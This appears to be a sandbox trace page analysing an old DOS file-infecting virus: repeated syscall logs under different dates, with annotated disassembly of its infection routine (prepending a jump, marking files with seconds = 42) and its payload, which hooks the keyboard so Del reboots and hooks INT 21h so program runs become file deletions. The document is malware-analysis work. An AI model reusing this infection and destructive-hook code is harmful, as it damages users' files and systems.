; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-25T11:51:02.666120984Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-25T11:51:02.68677149Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:51:02.688378566Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:02.695004358Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:51:02.697685848Z 62 PC: 12bf8 | Close file
2018-12-25T11:51:02.705514864Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:51:02.720532889Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.72443837Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.734162587Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.740860742Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.748260918Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.752668804Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.75510136Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.758547117Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.760055299Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.762581307Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.764067664Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.77164108Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.781308635Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.783923138Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.794679679Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.801399516Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.8074867Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.809418267Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.812399918Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.815800796Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.817757979Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.820933811Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.822920552Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.831059119Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.840949953Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.843560768Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.853952207Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.861301619Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.867762376Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.869836326Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.872604075Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.875581719Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.877975087Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.880914444Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.882454132Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.890399158Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.900703268Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.903261043Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.912755109Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.919614726Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.92615905Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.927572782Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.930844307Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.933931696Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.93559001Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.939007587Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.940714943Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.948071843Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.959472251Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.962219521Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.971838376Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.979332786Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.986108307Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.987592886Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.990547678Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.001416892Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.003189475Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.010802128Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.012655217Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.020870685Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.031164543Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.033944856Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.043850458Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.051294757Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.058207527Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.059530532Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.062183659Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.064936227Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.066159574Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.068906102Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.070723149Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.078177639Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.087917275Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.090630659Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.101950028Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.110449821Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.117562987Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.119280522Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.122736292Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.131042686Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.132685248Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.135736214Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.137776018Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.14521371Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.15491864Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.159570986Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1
; Viewer's disassembly window for the "Get date" row above; the first instruction
; (0x12c0d: cmp dl, 1) is printed on that row. INT 21h AH=2Ah returns the day of
; the month in DL, so that compare tests for the 1st.
0x12c10: je 0x12c14    ; DL == 1: continue at the message code below
0x12c12: jmp 0x12c7b    ; any other day: skip ahead; the page's TSR row is logged at PC 12c7b
0x12c14: mov ah, 9    ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12c16: lea dx, word ptr [bp + 0x25b]    ; DX = address of the string at bp+0x25b
0x12c1a: int 0x21    ; the page's triggered run logs this as Display string 'Bad command or filename' (PC 12c1c)
0x12c1c: jmp 0x12c48    ; jump over 0x12c1e-0x12c47; the triggered run then logs get/set vector calls at PC 12c4d-12c76
; NOTE(review): 0x12c1e-0x12c30 has the shape of a keyboard-interrupt handler and
; is presumably the routine installed for vector 09h; the set-vector arguments
; are outside this window — confirm.
0x12c1e: push ax
0x12c1f: in al, 0x60    ; read the keyboard controller data port
0x12c21: cmp al, 0x53    ; 0x53 is the make code of the Del key
0x12c23: je 0x12c2b
0x12c25: pop ax
0x12c26: ljmp ptr cs:[0x27f]    ; other keys: continue through the far pointer stored at cs:0x27f (presumably the saved original vector)
0x12c2b: ljmp 0xffff:0    ; Del pressed: far jump to FFFF:0000, the CPU reset entry point, so the machine restarts
0x12c30: iret
; NOTE(review): 0x12c31 onward is presumably the routine installed for vector
; 21h; it tests the caller's AX — confirm against the set-vector arguments.
0x12c31: cmp ax, 0x4b00    ; 4B00h = INT 21h "load and execute program"
0x12c34: jne 0x12c3a
0x12c36: mov ah, 0x41    ; AH=41h = "delete file"; DX is not changed between the compare and the int
0x12c38: int 0x21    ; so an execute request is reissued as a delete of the same DS:DX path
; 4B9Fh is not a documented DOS function. NOTE(review): may be a residency
; self-check; the branch that follows is outside this window.
0x12c3a: cmp ax, 0x4b9f
2018-12-25T11:51:03.16167868Z 9 PC: 12c1c | Display string (String= 'Bad command or filename')
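2018-12-25T11:51:03.163992578Z 53 PC: 12c4d | Get interrupt vector (Interrupt = '9' AKA 'Display string') [the viewer's label is the name of INT 21h function 09h; interrupt vector 09h itself is the keyboard hardware interrupt]
2018-12-25T11:51:03.166105357Z 37 PC: 12c5f | Set interrupt vector (Interrupt = '9' AKA 'Display string') [same mislabel: this replaces the keyboard interrupt handler]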
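2018-12-25T11:51:03.167183634Z 53 PC: 12c64 | Get interrupt vector (Interrupt = '33' AKA 'Random read') [33 decimal is vector 21h, the DOS services interrupt; 'Random read' is the name of INT 21h function 21h, not of this vector]
2018-12-25T11:51:03.168500984Z 37 PC: 12c76 | Set interrupt vector (Interrupt = '33' AKA 'Random read') [same mislabel: this replaces the INT 21h handler]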
2018-12-25T11:51:03.170710146Z 49 PC: 12c7b | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4145,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:02.749467284Z 26 PC: 12b70 | Set disk transfer address
2018-12-25T11:51:02.751793075Z 78 PC: 12b7b | Find first file
2018-12-25T11:51:02.7598188Z 67 PC: 12b9b | Get or set file attributes
2018-12-25T11:51:02.779106168Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:02.788207247Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:02.799004639Z 66 PC: 12bb8 | Move file pointer
2018-12-25T11:51:02.801040356Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-25T11:51:02.804443645Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-25T11:51:02.815437243Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:51:02.817424265Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:02.825744713Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:51:02.829123654Z 62 PC: 12bf8 | Close file
2018-12-25T11:51:02.839039732Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:51:02.850689309Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.854245768Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.865526323Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.873354916Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.88174517Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.883406796Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.886119933Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.896013591Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.897775636Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.900856958Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.902573906Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.911611897Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.923459125Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.926882914Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:02.939000905Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:02.946457275Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:02.953782492Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:02.957041411Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:02.959727323Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:02.963722775Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:02.966465793Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:02.970083481Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:02.971725995Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:02.981835303Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:02.993138017Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:02.9964822Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.008685151Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.016178977Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.02353044Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.025787326Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.029408252Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.033119862Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.035131884Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.039611434Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.041689598Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.050884748Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.06381467Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.069038491Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.080555733Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.088948236Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.096801539Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.098595847Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.102023628Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.105487402Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.10707747Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.110846415Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.112798255Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.121646682Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.133156121Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.137031269Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.148150568Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.155723647Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.164249317Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.166197255Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.169232842Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.17958928Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.181558202Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.189297131Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.192004722Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.201087007Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.212438192Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.216670305Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.228513604Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.236339523Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.245182818Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.24759679Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.250627848Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.254273287Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.257287208Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.260594107Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.26268983Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.272013632Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.283410748Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.287111817Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.298816626Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.308050172Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.312300044Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.315162849Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.31785337Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.321902475Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.324518443Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.32847682Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.330422868Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.339630445Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.352367584Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.355563047Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1
; Viewer's disassembly window for the "Get date" row above; the first instruction
; (0x12c0d: cmp dl, 1) is printed on that row. INT 21h AH=2Ah returns the day of
; the month in DL, so that compare tests for the 1st.
0x12c10: je 0x12c14    ; DL == 1: continue at the message code below
0x12c12: jmp 0x12c7b    ; any other day: skip ahead; the page's TSR row is logged at PC 12c7b
0x12c14: mov ah, 9    ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12c16: lea dx, word ptr [bp + 0x25b]    ; DX = address of the string at bp+0x25b
0x12c1a: int 0x21    ; the page's triggered run logs this as Display string 'Bad command or filename' (PC 12c1c)
0x12c1c: jmp 0x12c48    ; jump over 0x12c1e-0x12c47; the triggered run then logs get/set vector calls at PC 12c4d-12c76
; NOTE(review): 0x12c1e-0x12c30 has the shape of a keyboard-interrupt handler and
; is presumably the routine installed for vector 09h; the set-vector arguments
; are outside this window — confirm.
0x12c1e: push ax
0x12c1f: in al, 0x60    ; read the keyboard controller data port
0x12c21: cmp al, 0x53    ; 0x53 is the make code of the Del key
0x12c23: je 0x12c2b
0x12c25: pop ax
0x12c26: ljmp ptr cs:[0x27f]    ; other keys: continue through the far pointer stored at cs:0x27f (presumably the saved original vector)
0x12c2b: ljmp 0xffff:0    ; Del pressed: far jump to FFFF:0000, the CPU reset entry point, so the machine restarts
0x12c30: iret
; NOTE(review): 0x12c31 onward is presumably the routine installed for vector
; 21h; it tests the caller's AX — confirm against the set-vector arguments.
0x12c31: cmp ax, 0x4b00    ; 4B00h = INT 21h "load and execute program"
0x12c34: jne 0x12c3a
0x12c36: mov ah, 0x41    ; AH=41h = "delete file"; DX is not changed between the compare and the int
0x12c38: int 0x21    ; so an execute request is reissued as a delete of the same DS:DX path
; 4B9Fh is not a documented DOS function. NOTE(review): may be a residency
; self-check; the branch that follows is outside this window.
0x12c3a: cmp ax, 0x4b9f
2018-12-25T11:51:03.358506219Z 26 PC: 12c84 | Set disk transfer address
2018-12-25T11:51:03.361359224Z 76 PC: 12a5b | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4145,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:02.923855263Z 26 PC: 12b70 | Set disk transfer address
2018-12-25T11:51:02.92603905Z 78 PC: 12b7b | Find first file
2018-12-25T11:51:02.933349156Z 67 PC: 12b9b | Get or set file attributes
2018-12-25T11:51:02.950036813Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:02.964442156Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:02.972082897Z 66 PC: 12bb8 | Move file pointer
2018-12-25T11:51:02.974031182Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
; Viewer's disassembly window for the "Get time" row above; the first instruction
; (0x12bc7) is printed on that row. Traced PCs are the addresses right after each
; int 0x21 shown here.
; NOTE(review): the next traced call (write 380 bytes) is at PC 12b47, so the call
; target is presumably 0x12b39 with the 16-bit offset wrap not applied — confirm.
0x12bcb: call 0x22b39
; One-byte opcode (next instruction is at +1); in 16-bit code that byte is CWD,
; DX = sign extension of AX — TODO confirm the decoder mode.
0x12bce: cdq
0x12bcf: sub cx, cx    ; CX = 0
0x12bd1: mov ax, 0x4200    ; INT 21h AH=42h, AL=00h: move file pointer to CX:DX from start of file
0x12bd4: int 0x21    ; traced as "Move file pointer" (PC 12bd6)
0x12bd6: lea dx, word ptr [bp + 0x27c]    ; DX = address of the buffer at bp+0x27c
0x12bda: mov cx, 3    ; byte count
0x12bdd: mov ah, 0x40    ; INT 21h AH=40h: write to file handle
; Traced as "Write 3 bytes" (PC 12be1). The trace also shows a 3-byte read right
; after the open, so this presumably replaces the file's first three bytes — confirm.
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]    ; DX = date word for AX=5701h
0x12be5: mov cx, word ptr [bp + 0x29d]    ; CX = time word for AX=5701h
0x12be9: and cl, 0xe0    ; clear bits 0-4, the 2-second count of a DOS time word
0x12bec: or cl, 0x15    ; set that count to 0x15 (21), i.e. seconds = 42
; Every file written by this routine gets a modification time with seconds = 42,
; a fixed value usable as a triage indicator; whether the sample itself tests it
; is not visible in this window.
0x12bef: mov ax, 0x5701    ; INT 21h AX=5701h: set file date and time
0x12bf2: int 0x21    ; traced as "Get or set file date and time" (PC 12bf4)
0x12bf4: mov ah, 0x3e    ; INT 21h AH=3Eh: close file handle
0x12bf6: int 0x21    ; traced as "Close file" (PC 12bf8)
; NOTE(review): 0x29d / 0x29f / 0x2a5 are spaced like the time, date and name
; fields of a find-first record (+0x16, +0x18, +0x1e) — presumably the DTA is at
; bp+0x287; confirm.
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx    ; CX = 0; window ends here, next traced call is at PC 12c07 (file attributes)
2018-12-25T11:51:02.977125862Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-25T11:51:02.987610361Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:51:02.989323288Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:02.996694507Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:51:02.999622948Z 62 PC: 12bf8 | Close file
2018-12-25T11:51:03.008766718Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:51:03.019998704Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.023559004Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.035099464Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.042705049Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.050260869Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.052231695Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.055464318Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.059300688Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.062551746Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.06619759Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.068187202Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.077316324Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.088603002Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.092496457Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.10457777Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.11236948Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.119896971Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.122116022Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.125385523Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.128797419Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.130441204Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.134297094Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.136271607Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.144793482Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.156496227Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.160671438Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.171919399Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.180607904Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.188258864Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.19048398Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.194501291Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.197940621Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.199698126Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.203590135Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.205626689Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.214342602Z 67 PC: 12c07 | Get or set file attributes (See above)
